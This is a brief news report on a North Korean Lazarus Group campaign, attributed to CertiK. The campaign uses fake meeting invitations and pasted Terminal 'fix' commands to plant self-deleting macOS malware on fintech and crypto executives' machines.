North Korea's Lazarus Group Deploys macOS Malware to Hunt Crypto, Fintech Executives

Odaily Planet Daily reports that CertiK has detected a Lazarus Group campaign dubbed "MachO Man" aimed at executives in fintech and cryptocurrency. The operation uses "ClickFix" social engineering, luring targets with bogus online meeting invitations and persuading them to paste "fix" commands into macOS Terminal, allowing attackers to breach corporate and financial systems. CertiK researcher Natalie Newson said Lazarus has stolen more than $500 million over the past two weeks through attacks involving Drift and KelpDAO. MachO Man is described as a modular macOS malware toolkit built by Chollima, a Lazarus subgroup, and is designed to self-delete after execution to reduce the chance of detection. CertiK added that the campaign has also been carried out by hijacking DeFi project domains and swapping in fake Cloudflare notices to facilitate the lure.